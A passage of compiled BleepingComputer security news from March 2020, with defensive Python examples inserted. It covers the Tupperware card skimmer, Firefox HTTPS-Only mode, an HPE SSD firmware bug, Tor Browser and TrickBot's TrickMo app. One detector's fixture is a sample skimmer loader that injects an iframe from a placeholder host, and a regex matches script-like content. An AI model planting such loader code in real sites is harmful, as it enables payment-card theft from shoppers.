To keep shoppers unaware of the credit card skimming, they would see an error immediately after entering the sensitive data. Next, the page would reload with the legitimate form and they could complete the purchase.

“Upon close inspection, we see the fraudsters even copied the session time-out message from CyberSource, the payment platform used by Tupperware. The legitimate payment form from CyberSource includes a security feature where, if a user is inactive after a certain amount of time, the payment form is cancelled and a session time-out message appears” - Jérôme Segura, Malwarebytes

Tupperware customer data collected by cybercriminals this way includes first and last name, billing address, phone number, credit card number, credit card expiry date, and the CVV (card verification value, required for online shopping).

How the rogue iframe came to load on the Tupperware website is also interesting. Segura found a snippet of code on the homepage that was dynamically calling a FAQ icon from Tupperware's server.

The icon loaded silently and invisibly to shoppers and contained malicious JavaScript responsible for loading the attackers’ iframe on the checkout page.
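An "icon" that carries a loader is easy to miss in a file listing but easy to catch with a structural check: a real PNG is a fixed signature followed by length-prefixed, CRC-protected chunks ending in IEND, and nothing should follow that. The inspector below is an added example, not Malwarebytes' or Tupperware's code. The article says the FAQ icon "contained malicious JavaScript" without detailing the packaging, so the code covers the two shapes such files commonly take (an assumption): a script body served under an image name, and script appended after a genuine PNG's IEND chunk. All byte strings are constructed samples, and fake-pay.test is a placeholder, not the campaign's domain.

```python
"""Check whether a file served as an image is only an image.

Added example, not Malwarebytes' or Tupperware's code. The article says the
FAQ icon "contained malicious JavaScript" without detailing the packaging, so
this inspector covers the two shapes such files commonly take (assumption):
a script body served under an image name, and script appended after a real
PNG's IEND chunk. All byte strings below are constructed samples, and
fake-pay.test is a placeholder, not the campaign's domain.
"""
import re
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JS_HINT = re.compile(rb"document\.|window\.|createElement\(|<script|iframe|eval\(|\.src\s*=")


def _chunk(ctype, data=b""):
    """One PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_minimal_png():
    """A valid 1x1 8-bit greyscale PNG (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter byte + one pixel
    return (PNG_MAGIC + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND"))


def inspect_image(data):
    """Walk the chunk list up to IEND and report anything that follows it."""
    if not data.startswith(PNG_MAGIC):
        return {"is_png": False, "trailing": len(data),
                "script_like": bool(JS_HINT.search(data)),
                "verdict": "not a PNG at all"}
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return {"is_png": True, "trailing": 0, "script_like": False,
                    "verdict": "truncated chunk"}
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[end - 4:end])[0]
        if crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            return {"is_png": True, "trailing": 0, "script_like": False,
                    "verdict": "bad chunk CRC"}
        pos = end
        if ctype == b"IEND":
            break
    trailing = data[pos:]
    script_like = bool(JS_HINT.search(trailing))
    if not trailing:
        verdict = "clean PNG"
    elif script_like:
        verdict = "script appended after IEND"
    else:
        verdict = "unexpected trailing bytes"
    return {"is_png": True, "trailing": len(trailing),
            "script_like": script_like, "verdict": verdict}


# Constructed samples.
CLEAN_ICON = build_minimal_png()
LOADER_JS = (b"var f=document.createElement('iframe');"
             b"f.src='https://fake-pay.test/form';document.body.appendChild(f);")
POLYGLOT_ICON = CLEAN_ICON + b"\n" + LOADER_JS   # looks like an icon, carries a loader
FAKE_ICON = LOADER_JS                             # script served as "icon.png"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_ICON), ("polyglot", POLYGLOT_ICON), ("fake", FAKE_ICON)):
        print(name, inspect_image(blob)["verdict"])
```

Run it over every file the web root serves as an image; a hit on a file referenced from the homepage or checkout template is exactly the loader stage described here. Note that the check is structural, so it will also flag benign trailing junk, which is worth a look in its own right on a payment site.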


It is unclear for how long the malicious activity survived on the Tupperware website, but the March 9 registration date of the domain hosting the fake payment form is an indication, especially since the rogue code was not present in February.

Incomplete cleanup
As for how the compromise happened, Segura found a possible answer by using Sucuri’s SiteCheck service, which shows that the website is running an outdated version of Magento e-commerce software.

Tupperware did not respond to Malwarebytes's attempts to disclose the breach responsibly but did take action to remove the risk to customers.

The PNG file with code that loaded the iframe is no longer available on the website but the script that called it in the first place is still present, Segura told BleepingComputer.


The researcher says that shutting hackers out of a website requires a deep inspection to determine how the compromise happened in the first place and to make sure that there are no vulnerabilities that could lead to a new breach.

"Like any website compromise, it is important to look for the root cause by inspecting server side logs and determine if the attackers still have access. Often times, criminals will leave PHP backdoors or can simply re-exploit the same vulnerability to get back in" - Jérôme Segura, Malwarebytes

Update March 25, 11:22 EDT: A tweet from Malwarebytes informs that Tupperware removed the rest of the client-side malicious artifacts. Hopefully, the company did a thorough investigation to close any gaps that hackers might use for a future attack.


Mozilla Firefox Gets a HTTPS Only Mode For More Secure Browsing
29
.3.2020  Bleepingcomputer  Security

Mozilla Firefox 76 is getting a new 'HTTPS Only' mode that automatically upgrades all HTTP requests to HTTPS when browsing the web and blocks all connections that can't be upgraded.

When connecting to an HTTP site, your connection is not encrypted, and your ISP or anyone else on the network path can monitor the data being sent over it. This includes your passwords, credit card info, and other sensitive information.

Due to this, it is always recommended that you only use HTTPS sites, which encrypt the connection between the browser and the web site.

While most websites now use HTTPS, some continue to use only HTTP, and Mozilla is adding a new feature that will automatically upgrade your connection to HTTPS or block you from visiting the site.

Mozilla's 'HTTPS Only' mode
Similar to the HTTPS Everywhere add-on, when Firefox's HTTPS Only feature is enabled the browser will automatically change any HTTP request to HTTPS and, if unable to connect, will display an alert asking if you wish to continue over HTTP.

Being developed for Firefox 76, this feature will not be enabled by default. It will also attempt to upgrade subresources like CSS files, scripts, and images to HTTPS and, if unable to do so, quietly block them from loading.

Currently, if a Firefox user types foo.com in the address bar then our internal machinery establishes an HTTP connection to foo.com. Within this project we will expose a preference which allows end users to opt into an 'HTTPS Only' mode which tries to establish an HTTPS connection rather than an HTTP connection for foo.com. Further, we will upgrade all subresources within the page to load using https instead of http.

Implementation considerations:

For top-level loads which encounter a time-out we could provide some kind of error page with a button which would allow the end user to load the requested page using http.
For subsource loads we could fail silently and just log some info to the console.
This feature is currently available in the Firefox 76 Nightly builds and can be enabled by toggling the 'dom.security.https_only_mode' setting to 'True' in about:config.

dom.security.https_only_mode flag
Once enabled, if you go to an HTTP site, Firefox will automatically change it to an HTTPS connection. If unable to connect via HTTPS, it will display an alert as shown below.

Warning about an HTTP connection
This alert warns that continuing to the HTTP site is a "Potential Security Risk" and recommends that you do not continue. If you choose to continue, the 'HTTPS Only' mode will be disabled for the site.
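The behaviour described above amounts to a small decision table: upgrade HTTP to HTTPS, show an error page for a top-level load that cannot be upgraded, silently block a subresource that cannot be upgraded, and stop enforcing for a host once the user clicks through. The model below is an added example, not Mozilla's implementation. Which hosts answer over HTTPS is simulated by a constructed table so the code runs offline; in Firefox the trigger is a connection error or time-out, and a missing table entry stands in for that (an assumption). The hostnames are placeholders.

```python
"""Model of the 'HTTPS Only' decisions described above.

Added example, not Mozilla's implementation. Which hosts answer over HTTPS
is simulated by a constructed table, so it runs offline; in Firefox the
trigger is a connection error or time-out, and a missing table entry
stands in for that (assumption). Hostnames are placeholders.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed: hosts that accept HTTPS. Anything else is HTTP-only.
HTTPS_CAPABLE = {"www.example.test", "cdn.example.test"}


class HttpsOnlyPolicy:
    def __init__(self, enabled=True):
        self.enabled = enabled          # dom.security.https_only_mode
        self.exceptions = set()         # hosts the user chose to load over HTTP
        self.console = []               # silently blocked subresources land here

    @staticmethod
    def upgrade(url):
        parts = urlsplit(url)
        if parts.scheme != "http":
            return url
        return urlunsplit(("https",) + tuple(parts[1:]))

    def load(self, url, top_level=True):
        """Return (action, url) with action 'load', 'error_page' or 'blocked'."""
        parts = urlsplit(url)
        if (not self.enabled or parts.scheme != "http"
                or parts.hostname in self.exceptions):
            return ("load", url)
        if parts.hostname in HTTPS_CAPABLE:
            return ("load", self.upgrade(url))
        if top_level:
            # The user sees the warning page and may click through.
            return ("error_page", url)
        # Subresources fail quietly, with only a console note.
        self.console.append(f"HTTPS-Only Mode: blocked insecure subresource {url}")
        return ("blocked", url)

    def continue_insecure(self, url):
        """User accepted the risk: the mode is off for this host from now on."""
        self.exceptions.add(urlsplit(url).hostname)
        return self.load(url)


def walkthrough():
    """One browsing session; returns the decisions and the console log."""
    policy = HttpsOnlyPolicy()
    steps = [
        policy.load("http://www.example.test/"),                         # upgraded
        policy.load("http://neverssl.test/"),                            # warning page
        policy.load("http://neverssl.test/style.css", top_level=False),  # quiet block
        policy.continue_insecure("http://neverssl.test/"),               # user clicks through
        policy.load("http://neverssl.test/style.css", top_level=False),  # now allowed
    ]
    return steps, policy.console


if __name__ == "__main__":
    for step in walkthrough()[0]:
        print(*step)
```

The point worth noticing is the last two steps: clicking through on the error page does not just load that one page, it exempts the whole host, so the site's HTTP subresources load afterwards as well.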

Warning: Potential Security Risk Ahead

Nightly detected a potential security threat and did not continue to neverssl.com. If you visit this site, attackers could try to steal information like your passwords, emails, or credit card details.

What can you do about it?

The issue is most likely with the website, and there is nothing you can do to resolve it. You can notify the website’s administrator about the problem.
This is an interesting feature and one that many users will want to enable, as it only increases the security of the websites you visit, with the minor inconvenience of an occasional alert when you browse to an insecure website.


Three More Ransomware Families Create Sites to Leak Stolen Data
29
.3.2020  Bleepingcomputer  Ransomware

Three more ransomware families have created sites that are being used to leak the stolen data of non-paying victims, which further illustrates why all ransomware attacks must be considered data breaches.

Ever since Maze created their "news" site to publish stolen data of their victims who choose not to pay, other ransomware actors such as Sodinokibi/REvil, Nemty, and DoppelPaymer have been swift to follow.

Over the past two days, BleepingComputer has learned of another three ransomware families who have now launched their data leak sites, which are listed below.

While we have been saying it for a long time, with the continued release of data leak sites, ransomware attacks must be treated as data breaches now that the personal and private data of employees is being published online.

To make matters worse, other threat actors are taking the data exposed in these leaks and selling it on hacker forums so it can be utilized in other attacks.

Nefilim Ransomware
The Nefilim Ransomware has launched a site called "Corporate Leaks" that is being used to dump the data of victims who do not pay a ransom.

Nefilim is fairly new and is believed to be a new version of the Nemty Ransomware.

Nefilim Ransomware Leak Site
This leak site currently lists two companies, both in the energy or resources sector.

CLOP Ransomware
The CLOP Ransomware has also released a leak site called "CL0P^_- LEAKS" that they are using to publish stolen data for non-paying victims.

The CLOP Ransomware made news recently after it attacked the Maastricht University and was paid 30 bitcoins to recover their data.

CLOP Leaks Site
The site currently lists four different companies whose data has been released.

Sekhmet Ransomware
Finally, a relatively new ransomware called Sekhmet has also released a data leak site called "Leaks leaks and leaks".

Not much is known about this ransomware other than that their ransom note is named "RECOVER-FILES.txt".

Sekhmet Leak Site
Their leak site only lists one company at this time.


HPE Warns of New Bug That Kills SSD Drives After 40,000 Hours
29
.3.2020  Bleepingcomputer  Vulnerability

Hewlett Packard Enterprise (HPE) is once again warning its customers that certain Serial-Attached SCSI solid-state drives will fail after 40,000 hours of operation, unless a critical patch is applied.

The company made a similar announcement in November 2019, when a firmware defect caused drives to fail after 32,768 hours of operation.

Affected drives
The current issue affects drives in HPE server and storage products such as HPE ProLiant, Synergy, Apollo 4200, Synergy Storage Modules, D3000 Storage Enclosures, and StoreEasy 1000 Storage.

| HPE Model Number | HPE SKU | HPE SKU Description | HPE Spare Part SKU | HPE Firmware Fix Date |
|---|---|---|---|---|
| EK0800JVYPN | 846430-B21 | HPE 800GB 12G SAS WI-1 SFF SC SSD | 846622-001 | 3/20/2020 |
| EO1600JVYPP | 846432-B21 | HPE 1.6TB 12G SAS WI-1 SFF SC SSD | 846623-001 | 3/20/2020 |
| MK0800JVYPQ | 846432-B21 | HPE 800GB 12G SAS MU-1 SFF SC SSD | 846624-001 | 3/20/2020 |
| MO1600JVYPR | 846436-B21 | HPE 1.6TB 12G SAS MU-1 SFF SC SSD | 846625-001 | 3/20/2020 |
The company says that this is a comprehensive list of impacted SSDs it makes available. However, the issue is not unique to HPE and may be present in drives from other manufacturers.

If an affected SSD runs a firmware version older than HPD7, it will fail after being powered on for 40,000 hours; this translates into 4 years, 206 days and 16 hours of power-on time, about half a year shorter than the extended warranty available for some of them.

When the failure point is reached, neither the data nor the drive can be recovered. Recovering from such a failure is only possible in environments with working data backups.

HPE learned about the firmware bug from an SSD manufacturer and warns that SSDs installed and put into service at the same time are likely to fail almost concurrently.

“Restoration of data from backup will be required in non-fault tolerance modes (e.g., RAID 0) and in fault tolerance RAID mode if more drives fail than what is supported by the fault tolerance RAID mode logical drive [e.g. RAID 5 logical drive with two failed SSDs]” - HPE advisory

The new firmware can be installed by using the online flash component for VMware ESXi, Windows, and Linux.

Last month, Dell EMC released new firmware to correct a bug causing nine SanDisk SSDs in its portfolio to fail "after approximately 40,000 hours of usage." Dell identified the following models to be impacted:

LT0200MO
LT0400MO
LT0800MO
LT1600MO
LT0200WM
LT0400WM
LT0800WM
LT0800RO
LT1600RO
The update corrects a check for logging the circular buffer index value. "Assert had a bad check to validate the value of circular buffer's index value. Instead of checking the max value as N, it checked for N-1," Dell's advisory explains.
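Dell's description is the classic off-by-one: a circular buffer with N slots has valid indices 0 to N-1, and an assert that bounds the index by N-1 instead of N rejects the last legal slot. The snippet below reproduces that in miniature with the buggy check beside the corrected one; it is an added example, not Dell's, SanDisk's or HPE's firmware. What advances the index in the real firmware, and why that lands at roughly 40,000 hours, is not in the advisory; the example assumes one log entry per event.

```python
"""The off-by-one Dell describes, reproduced in miniature.

Added example; not Dell's, SanDisk's or HPE's firmware. A circular log of
N slots has valid indices 0..N-1. Per the advisory the assert compared
against N-1 instead of N, so writing the last legal slot trips it. What
advances the index in the real firmware, and why that lands at roughly
40,000 hours, is not in the advisory; here one entry per event is assumed.
"""


class FirmwareAssert(Exception):
    """Stands in for a firmware assert that halts the drive."""


class CircularLog:
    def __init__(self, slots, buggy):
        self.slots = slots
        self.buggy = buggy
        self.index = 0
        self.entries = [None] * slots

    def _check_index(self):
        # Bad check: N-1 as the bound rejects the last valid slot.
        # Good check: N as the bound accepts 0..N-1 exactly.
        limit = self.slots - 1 if self.buggy else self.slots
        if not 0 <= self.index < limit:
            raise FirmwareAssert(f"index {self.index} not below {limit}")

    def append(self, entry):
        self._check_index()
        self.entries[self.index] = entry
        self.index = (self.index + 1) % self.slots  # wrap at N


def events_until_halt(slots, buggy, max_events=1_000_000):
    """Number of the event that trips the assert, or None if none does."""
    log = CircularLog(slots, buggy)
    for n in range(1, max_events + 1):
        try:
            log.append(n)
        except FirmwareAssert:
            return n
    return None


if __name__ == "__main__":
    print("buggy:", events_until_halt(16, buggy=True))    # halts on event 16
    print("fixed:", events_until_halt(16, buggy=False))   # None: wraps forever
```

The halt is deterministic and depends only on the number of events, which is why drives put into service together fail together: they all write the same slot at about the same time.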

Customers that were shipped one or more of the affected SSD models were informed about this "potentially critical issue" with the recommendation to apply the update immediately.

source: Ravigon
Not as bad as last time
There is some good news, though. Going by HPE's shipping dates and the 40,000-hour limit, no affected SSDs have failed because of this firmware bug yet.

HPE estimates that unpatched SSDs will begin to fail as early as October 2020. This gives plenty of time for admins to apply the corrected firmware.

Back in November, reports about storage drive failures poured in on social media and forums, with users complaining about devices failing in bulk, minutes apart.

Finding out the uptime of an affected drive is possible with the Smart Storage Administrator (SSA) utility, which offers the power-on time for every drive installed on the system.

Alternatively, users can run scripts that can check if the firmware on their SSDs has the 40,000 power-on-hours failure issue. The scripts work for certain HPE‌‌ SAS SSDs and are available for Linux, VMware and Windows.
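For anyone without HPE's scripts or SSA at hand, the same audit can be done from smartctl output: read the drive's power-on hours and firmware revision, and if the revision predates the fix, project when the 40,000-hour mark will be reached. The script below is an added example, not HPE's check scripts or its SSA utility. It accepts the two shapes smartctl prints, the SATA attribute table (Power_On_Hours raw value) and the SAS form ("Accumulated power on time, hours:minutes"). Both samples are constructed, and comparing firmware strings lexicographically (HPD6 before HPD7) is an assumption that holds for the HPDn revisions the advisory names.

```python
"""Audit power-on hours and firmware against the 40,000-hour limit.

Added example, not HPE's check scripts or its SSA utility. The input is
text in the two shapes smartctl prints: the SATA attribute table
(Power_On_Hours raw value) and the SAS form ("Accumulated power on time,
hours:minutes"). Both samples are constructed. Comparing firmware strings
lexicographically (HPD6 < HPD7) is an assumption that holds for the HPDn
revisions named in the advisory.
"""
import re
from datetime import datetime, timedelta

FAIL_AFTER_HOURS = 40_000
FIXED_FIRMWARE = "HPD7"
REPORT_DATE = datetime(2020, 3, 25)   # "now" for the demo run

SATA_RE = re.compile(r"^\s*9\s+Power_On_Hours\s+(?:\S+\s+){7}(\d+)", re.M)
SAS_RE = re.compile(r"Accumulated power on time, hours:minutes\s+(\d+):\d+")
FW_RE = re.compile(r"^(?:Firmware Version|Revision):\s+(\S+)", re.M)


def parse_power_on_hours(text):
    m = SATA_RE.search(text) or SAS_RE.search(text)
    return int(m.group(1)) if m else None


def parse_firmware(text):
    m = FW_RE.search(text)
    return m.group(1) if m else None


def hours_to_days_hours(hours):
    return divmod(hours, 24)


def assess(text, now):
    """Is this drive on pre-fix firmware, and if so, when does it hit the limit?"""
    hours = parse_power_on_hours(text)
    firmware = parse_firmware(text)
    vulnerable = firmware is not None and firmware < FIXED_FIRMWARE
    hours_left = None if hours is None else FAIL_AFTER_HOURS - hours
    predicted = None
    if vulnerable and hours_left is not None:
        # Assumes the drive stays powered on continuously from `now`.
        predicted = now + timedelta(hours=hours_left)
    return {"power_on_hours": hours, "firmware": firmware, "vulnerable": vulnerable,
            "hours_left": hours_left, "predicted_failure": predicted}


# Constructed smartctl-style output for an affected SAS model on old firmware.
SAS_SAMPLE = """smartctl output (constructed sample)
Vendor:               HP
Product:              EK0800JVYPN
Revision:             HPD6
Accumulated power on time, hours:minutes 39120:15
"""

# Constructed SATA-style output, already on the fixed revision.
SATA_SAMPLE = """Firmware Version: HPD7
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  9 Power_On_Hours          0x0032   095   095   000    Old_age   Always       -       4132
"""

if __name__ == "__main__":
    for sample in (SAS_SAMPLE, SATA_SAMPLE):
        print(assess(sample, REPORT_DATE))
    print("40,000 hours = %d days, %d hours" % hours_to_days_hours(FAIL_AFTER_HOURS))
```

The projection is a worst case, since it counts every remaining hour as powered on; a drive that is shut down part of the time reaches the limit later, which is why the check must use power-on hours rather than the install date.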

Update March 25, 09:05 EDT: Article updated with details about some SanDisk SSDs that could also fail after 40,000 hours of operation time.

h/t JohnC_21 (comment below)


Tor Browser 9.0.7 Patches Bug That Could Deanonymize Users
29
.3.2020  Bleepingcomputer  Vulnerability

The Tor Project released Tor Browser 9.0.7 today with a permanent fix for a bug that allowed JavaScript code to run on the Safest security level in some situations while using the previous Tor Browser version.

Since Tor Browser users rely on its security features to browse the Internet anonymously, having JavaScript run unexpectedly, where it could be used for fingerprinting or for revealing their true location, defeats the browser's promise of browsing without tracking, surveillance, or censorship.

After updating to the latest version, all JavaScript is again disabled automatically on every site while browsing with Tor Browser on the Safest security level.

Tor Browser's Safest security level
"If you browse on Tor Browser's "Safest" security level: This release disables Javascript," the Tor Project team tweeted. "This may change your workflow if you previously allowed Javascript on some sites using NoScript."

"We're taking this precaution until we're confident recent NoScript versions successfully block Javascript execution, by default, by working around a Firefox ESR vulnerability."

While users were advised to toggle off the javascript.enabled flag in the browser's about:config page when Tor Browser 9.0.6 was released, the NoScript 11.0.17 update that was automatically pushed to all users was supposed to have fixed the bug.

But user reports later indicated that the extension update didn't fully mitigate the issue, which, again, could have led to some users' information being accidentally leaked and potentially deanonymizing them.

The Tor Project (@torproject), 4:09 PM - Mar 24, 2020:

"🔔 Time to update: There's a new version of Tor Browser out now. Tor Browser 9.0.7 updates Tor to 0.4.2.7 and NoScript to 11.0.19. If you browse on Tor Browser's "Safest" security level: This release disables Javascript." https://blog.torproject.org/new-release-tor-browser-907
The release of Tor Browser 9.0.7, however, now disables JavaScript for the entire browser when the Safest security level is selected, as it should.

While on the Safest security level, users can restore the previous behavior and allow JavaScript by following this procedure:

1. Open about:config
2. Search for: javascript.enabled
3. The "Value" column should show "false"
4. Either right-click and select "Toggle" so that the value is now "true" (enabled), or double-click on the row and it will be enabled.
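Whether this toggle, or the HTTPS Only preference from the Firefox 76 article above, actually took effect can be verified outside the browser by reading the profile's prefs.js, which stores each changed setting as a user_pref("name", value); line. The auditor below is an added example, not Tor Project or Mozilla code: it parses that format (values are JSON-style strings, numbers or booleans) and compares the two preferences against an expected table. The profile text is constructed, and the expected table is this example's idea of a locked-down profile, not a Tor Project recommendation.

```python
"""Audit a Firefox or Tor Browser prefs.js for the settings above.

Added example, not Tor Project or Mozilla code. prefs.js and user.js hold
lines of the form  user_pref("name", value);  where the value is a string,
number or boolean in JSON syntax. The profile text is constructed. Besides
javascript.enabled (this article) it checks dom.security.https_only_mode
from the Firefox 76 article above; the 'expected' table is this example's
assumption of a locked-down profile, not a Tor Project recommendation.
"""
import json
import re

PREF_RE = re.compile(r'^\s*(?:user_)?pref\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*(.*?)\s*\);\s*$')


def parse_prefs(text):
    """Map pref name -> value; unparseable values are kept as raw text."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if not m:
            continue      # comments, blank lines, anything else
        name, raw = m.group(1), m.group(2)
        try:
            prefs[name] = json.loads(raw)
        except ValueError:
            prefs[name] = raw
    return prefs


# What a locked-down profile should hold (this example's assumption).
EXPECTED = {
    "javascript.enabled": False,            # Safest level: no script anywhere
    "dom.security.https_only_mode": True,   # upgrade HTTP, block what cannot be
}


def audit(text, expected=EXPECTED):
    """For each expected pref: (actual value or None, matches_expectation)."""
    prefs = parse_prefs(text)
    return {name: (prefs.get(name), prefs.get(name) == want)
            for name, want in expected.items()}


# Constructed profiles.
LOCKED_DOWN = """// Mozilla User Preferences (constructed sample)
user_pref("javascript.enabled", false);
user_pref("dom.security.https_only_mode", true);
user_pref("browser.startup.homepage", "about:tor");
"""

RELAXED = """user_pref("javascript.enabled", true);
user_pref("browser.startup.homepage", "about:tor");
"""

if __name__ == "__main__":
    for label, profile in (("locked down", LOCKED_DOWN), ("relaxed", RELAXED)):
        print(label, audit(profile))
```

A preference that is absent from the file is reported as None rather than as its default, because prefs.js only records values the user or the browser changed; an absent javascript.enabled therefore means "browser default", not "disabled".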

"We are taking this precaution until we are confident recent NoScript versions successfully block Javascript execution, by default, by working around a Firefox ESR vulnerability," the Tor team explains.

This is not the first bug that could have been used to unmask Tor Browser users, with information exposure vulnerabilities being patched in the past by the Tor Project team to block attackers from bypassing the browser's anonymity features and discover the client's IP address, their language, or their UI locale.


TeamViewer Stops Commercial Use Checks in Coronavirus-Affected Regions
29
.3.2020  Bleepingcomputer  IT

TeamViewer has stated that they will stop performing checks for commercial use of their remote control product in regions heavily affected by the Coronavirus.

TeamViewer is remote control software that commercial organizations can purchase to offer remote support and that non-commercial, or personal, users can use for free to control their own computers or help friends and family.

Even though personal use of TeamViewer is meant to be free, some users are erroneously detected as using it commercially.

When this happens, their sessions will be disconnected and they are prompted to purchase the program with various alerts, some comical, as shown below.

TeamViewer Commercial use detected alerts
With more people working from home, friends and family helping each other with technical issues, or some using it for commercial reasons without a license, many TeamViewer users have started to receive the dreaded "Commercial use detected" alerts.

Once they receive this alert, their TeamViewer ID is added to a bucket of users who will continue to see this message when using TeamViewer. The only way to use TeamViewer again for personal use is to submit a request to have their TeamViewer ID reset.

After reaching out to TeamViewer, The Register was told that TeamViewer is stopping the checks for commercial use in regions heavily affected by the Coronavirus.

"We have stopped checking connections for commercial use in heavily affected regions like China and Italy already some weeks ago and are currently implementing that for lots of other affected countries including UK," TeamViewer told TheRegister.

In a statement to BleepingComputer, TeamViewer confirmed that the USA is also a region where commercial checks are no longer conducted.

"Yes, the US is also included now in the regions where we don’t check commercial use anymore to allow individuals (not commercial companies) to use TeamViewer in the current crisis situation for whatever purpose they need it," TeamViewer told BleepingComputer.

Update 3/25/20: Added TeamViewer's statement about the USA.


Microsoft Pauses Optional Windows Cumulative Updates Starting in May
29
.3.2020  Bleepingcomputer  OS

Due to the ongoing Coronavirus pandemic, Microsoft will stop releasing optional Windows cumulative updates starting in May 2020. This includes all supported Windows 10 and Windows Server versions.

As employees move to working remotely, and thus to adjusted work schedules, companies have started to pause releases of new software versions so that critical bugs don't arise at a time when they lack the staff to respond to them.

This was already seen with Google pausing new versions of Chrome and Microsoft following with the pausing of new Edge versions.

When Microsoft releases updates, they release what is called the "B" updates on the second Tuesday of every month, which is known as Patch Tuesday. These updates are considered mandatory as they contain security updates for vulnerabilities discovered or fixed since the last Patch Tuesday.

Microsoft also releases the optional cumulative "C" and "D" updates on the third and fourth weeks of each month. These updates are typically bug fixes and are considered optional to install as the fixes will ultimately be rolled into the following month's Patch Tuesday release.

Today, Microsoft announced that starting in May 2020 it will pause all optional non-security updates for all supported versions of Windows, including Server versions and prioritize their focus on security updates.

"We have been evaluating the public health situation, and we understand this is impacting our customers. In response to these challenges we are prioritizing our focus on security updates. Starting in May 2020, we are pausing all optional non-security releases (C and D updates) for all supported versions of Windows client and server products (Windows 10, version 1909 down through Windows Server 2008 SP2)."

Microsoft emphasizes that this will not impact their monthly scheduled B release on Patch Tuesday and those updates will continue as normal to ensure users are protected and can continue to be productive.

Microsoft also states that security will be their primary focus during the outbreak. This means that if a critical vulnerability is discovered, we would also continue to see out-of-band (OOB) security updates released.

Unfortunately, as many bugs in the Windows operating system are fixed in the optional cumulative updates (C & D), fixes that are not high priority may take a bit longer to resolve.


TrickBot Bypasses Online Banking 2FA Protection via Mobile App
29
.3.2020  Bleepingcomputer  Safety

The TrickBot gang is using a malicious Android application they developed to bypass the two-factor authentication (2FA) protection used by various banks by stealing transaction authentication numbers.

The Android app dubbed TrickMo by IBM X-Force researchers is actively being updated and it is currently being pushed via the infected desktops of German victims with the help of web injects in online banking sessions.

TrickBot's operators have designed TrickMo to intercept a wide range of transaction authentication numbers (TANs) including one-time password (OTP), mobile TAN (mTAN), and pushTAN authentication codes after victims install it on their Android devices.

Spotted for the first time in September 2019
TrickMo was initially spotted by CERT-Bund security researchers who said at the time that TrickBot-infected Windows computers will ask for the victims' online banking mobile phone numbers and device types to prompt them to install a bogus security app.

At the moment, the malicious app is being pushed by the TrickBot operators only to German targets, and it "camouflages" itself as an 'Avast Security Control' app or as a 'Deutsche Bank Security Control' utility.

Once installed on their phones, the app will forward text messages containing mTANs sent by the victims' banks to TrickBot's operators who can later use them to make fraudulent transactions.

Avast Security Control installation screen (Lukas Stefanko)
In a report analyzing TrickMo's capabilities published today, IBM X-Force researchers say that the malware is capable of preventing users of infected devices from uninstalling it, sets itself as the default SMS app, monitors running apps, and scrapes on-screen text.

"From our analysis of the TrickMo mobile malware, it is apparent that TrickMo is designed to break the newest methods of OTP and, specifically, TAN codes often used in Germany," IBM's researchers explain.

"Android operating systems include many dialog screens that require the denial, or approval, of app permissions and actions that have to receive input from the user by tapping a button on the screen.

"TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react."

This allows the Android Trojan to delete SMS messages it forwards to its masters so that the victims are never aware that their devices received a text message with a 2FA code from their banks.

Wide range of 'features'
The malware is also capable of gaining persistence on infected Android devices by registering a receiver that will listen for android.intent.action.SCREEN_ON and android.provider.Telephony.SMS_DELIVER broadcasts to restart itself after a reboot when the screen turns on or an SMS is received.

TrickMo is heavily obfuscated to hinder analysis and it was recently updated, in January 2020, with code that checks if the malware is running on a rooted device or an emulator.

From its large array of capabilities, the IBM X-Force researchers highlighted TrickMo's main ones designed for:

• Stealing personal device information
• Intercepting SMS messages
• Recording targeted applications for one-time password (OTP)/mobile TAN (mTAN)/pushTAN theft
• Lockdown of the phone
• Stealing pictures from the device
• Self-destruction and removal

TrickBot — a continuously updated banking malware
TrickBot is a modular banking malware continuously upgraded by its authors with new capabilities and modules since October 2016 when it was first spotted in the wild.

Although the first detected variants only came with banking Trojan capabilities used for harvesting and exfiltrating sensitive data, TrickBot has now evolved into a popular malware dropper that will infect compromised systems with other, sometimes more dangerous, malware strains.

TrickBot can deliver other malware as part of multi-stage attacks, Ryuk ransomware being one of the most notable ones, most likely after all useful information has been already collected and stolen.

The malware is also especially dangerous as it can propagate throughout enterprise networks and, if it gains admin access to a domain controller, it can steal the Active Directory database to obtain other network credentials.


Windows 10 Optional Cumulative Update KB4541335 Released
28.3.2020  Bleepingcomputer  OS

Microsoft is rolling out the March optional cumulative update for Windows 10 November 2019 Update (version 1909) and Windows 10 May 2019 Update (version 1903) with several fixes and improvements.

This is an optional update and it won't download or install automatically on your device unless you manually select 'Download and install' on the Windows Update page. The key changes include a fix for an issue that prevents the mute button from working on certain devices with the Your Phone app and a fix for a bug crashing File Explorer.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

KB4541335 comes with the following improvements for Windows 10 November 2019 Update (version 1909) and Windows 10 May 2019 Update (version 1903):

Addresses an issue that causes an error when printing to a document repository.
Addresses an issue that displays a misleading reset message for Win32 apps that are converted to Universal Windows Platform (UWP) apps, such as Microsoft Sticky Notes, Microsoft OneNote, and so on.
Addresses a drawing issue with the Microsoft Foundation Class (MFC) toolbar that occurs when dragging in a multi-monitor environment.
Addresses an issue that prevents the first key stroke from being recognized correctly in the DataGridView cell.
Addresses a performance issue in applications that occurs when content that is protected by digital rights management (DRM) plays or is paused in the background.
Addresses an issue that causes attempts to take a screenshot of a window using the PrintWindow API to fail.
